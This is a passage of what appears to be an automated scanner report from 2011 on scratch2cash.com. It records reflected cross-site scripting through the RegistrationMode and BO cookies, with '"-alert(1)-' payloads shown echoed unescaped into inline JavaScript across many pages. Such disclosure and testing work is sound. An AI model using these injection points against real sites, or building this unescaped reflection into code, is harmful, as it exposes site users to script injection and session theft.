"FM1a06c"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM59db6" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:28 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49076 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM59db6"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/ Set-Cookie: BO=FMa2c4e"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:43 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 53664 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMa2c4e"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMac554" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 53665 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMac554"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/ Set-Cookie: BO=FM3e2ea"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47720 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM3e2ea"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM254b0" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47720 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM254b0"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/ Set-Cookie: BO=FMa6481"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47212 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMa6481"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM2050b" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47211 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM2050b"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Home.aspx |
GET /Home.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/ Set-Cookie: BO=FMfd6ac"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44002 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMfd6ac"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Home.aspx |
GET /Home.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM11158" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44002 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM11158"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: BO=FM587a3"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 58504 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM587a3"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM207e8" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 58504 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM207e8"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: BO=FM574ed"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54985 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM574ed"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMe7ad9" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54985 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMe7ad9"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: BO=FM722d7"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49255 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM722d7"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMe7879" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:30 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49255 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMe7879"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/ Set-Cookie: BO=FMe8d82"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52639 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMe8d82"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM64604" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52640 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM64604"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: BO=FMbbbfd"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46419 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMbbbfd"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMf2b70" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:31 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46419 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMf2b70"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /Sitemap.aspx |
GET /Sitemap.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
